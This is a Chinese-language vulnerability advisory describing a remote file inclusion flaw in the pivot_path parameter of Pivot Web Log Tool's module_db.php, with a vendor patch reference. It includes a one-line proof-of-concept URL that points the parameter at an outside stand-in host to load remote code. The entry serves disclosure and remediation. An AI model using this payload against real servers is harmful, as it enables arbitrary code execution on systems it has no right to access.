添加时间:
2005-08-17

系统编号:
WAVDB-00481
BUGTRAQ: 10553

影响版本:
Pivot Web Log Tool 1.0 beta2-1.10

程序介绍:

Pivot是一款基于WEB的帮助用户维护动态站点的工具。

漏洞分析:

Pivot包含的module_db.php脚本不正确验证用户提交的数据，远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
其中module_db.php脚本对用户提供给'pivot_path'参数数据缺少过滤，提交远程服务器上的恶意文件作为参数，可能以WEB进程权限执行恶意文件中的任意代码。


漏洞利用:

http://www.example.com/pivot/modules/module_db.php?pivot_path=http://www.example.org/
 

解决方案:
厂商补丁：
Pivot
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
Pivot Upgrade Pivot_1.14.1_full.zip
https://sourceforge.net/project/ ... 5&release_id=245757

信息来源:
<*来源：loofus （loofus@0x90.org）
*>